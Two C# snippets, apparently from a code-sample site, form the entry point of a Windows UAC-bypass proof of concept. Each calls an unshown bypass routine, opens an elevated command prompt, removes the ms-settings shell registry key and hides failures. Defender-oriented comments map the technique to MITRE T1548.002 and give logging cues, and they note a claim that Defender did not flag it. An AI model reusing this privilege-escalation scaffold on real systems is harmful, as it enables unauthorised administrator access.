예제 #1
        /// <summary>
        /// Entry point of the proof of concept. When the process is not elevated it asks the
        /// user for confirmation and then calls <c>Bypass.UAC()</c> (defined elsewhere, not
        /// shown here). When the process is elevated it starts a command prompt and deletes
        /// the <c>shell</c> subtree under <c>HKCU\Software\Classes\ms-settings</c>.
        /// </summary>
        /// <remarks>
        /// Defender's view: this is the pattern catalogued as MITRE ATT&amp;CK T1548.002 (Bypass
        /// User Account Control). The <c>shell</c> subtree removed below is presumably the
        /// per-user handler override written by <c>Bypass.UAC()</c> - confirm against that
        /// method. Its creation and deletion under the ms-settings class key are the registry
        /// trace of this flow; registry auditing on that path (for example Sysmon registry
        /// events 12/13) records both, and process-creation logging shows a high-integrity
        /// process spawning CMD.exe.
        /// </remarks>
        static void Main()
        {
            try
            {
                if (!IsAdministrator())
                {
                    DialogResult choice = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);

                    switch (choice)
                    {
                        case DialogResult.Yes:
                            Bypass.UAC();
                            break;

                        // Both refusals end the process without touching the registry.
                        case DialogResult.Cancel:
                        case DialogResult.No:
                            Environment.Exit(0);
                            break;
                    }

                    return;
                }

                // The original re-queries the elevation state instead of using a plain else;
                // the second call is kept so the behaviour stays identical.
                if (!IsAdministrator())
                {
                    return;
                }

                // What runs once the process is elevated.
                string shellArgs = "/c start cmd.exe ";
                Process.Start("CMD.exe", shellArgs);

                // Cleanup of the per-user ms-settings class key. OpenSubKey returns null when
                // the key is absent; the resulting exception is swallowed by the catch below.
                RegistryKey settingsKey = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
                settingsKey.DeleteSubKeyTree("shell");
                settingsKey.Close();

                MessageBox.Show("Process Elevated!");
            }
            catch
            {
                // Every failure is hidden: the process exits with code 0 and reports nothing.
                Environment.Exit(0);
            }
        }
예제 #2
 /// <summary>
 /// Entry point of the proof of concept, without a confirmation prompt. When the process
 /// is not elevated it calls <c>Bypass.UAC()</c> (defined elsewhere, not shown here).
 /// When the process is elevated it starts a command prompt and deletes the <c>shell</c>
 /// subtree under <c>HKCU\Software\Classes\ms-settings</c>.
 /// </summary>
 /// <remarks>
 /// Defender's view: the <c>shell</c> subtree removed below is presumably the per-user
 /// handler override written by <c>Bypass.UAC()</c> - confirm against that method. Its
 /// creation and deletion under the ms-settings class key are the registry trace of this
 /// flow (MITRE ATT&amp;CK T1548.002); registry auditing on that path, for example Sysmon
 /// registry events 12/13, records both regardless of whether the binary itself is flagged.
 /// </remarks>
 static void Main()
 {
     try
     {
         if (!IsAdministrator())
         {
             Bypass.UAC();
             return;
         }

         // The original re-queries the elevation state instead of using a plain else;
         // the second call is kept so the behaviour stays identical.
         if (!IsAdministrator())
         {
             return;
         }

         // Original author's remark, dated 5-02-2021: the binary was reportedly not flagged
         // by Defender at that time. That is a point-in-time observation about static
         // detection only and says nothing about current or behavioural coverage.
         string target = "cmd.exe"; // example program started from the elevated process
         Process.Start("CMD.exe", "/c start " + target);

         // Cleanup of the per-user ms-settings class key. According to the original author,
         // leaving the "shell" subtree in place breaks the Windows right-click menu.
         // OpenSubKey returns null when the key is absent; the resulting exception is
         // swallowed by the catch below.
         RegistryKey settingsKey = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
         settingsKey.DeleteSubKeyTree("shell");
         settingsKey.Close();
     }
     catch
     {
         // Every failure is hidden: the process exits with code 0 and reports nothing.
         Environment.Exit(0);
     }
 }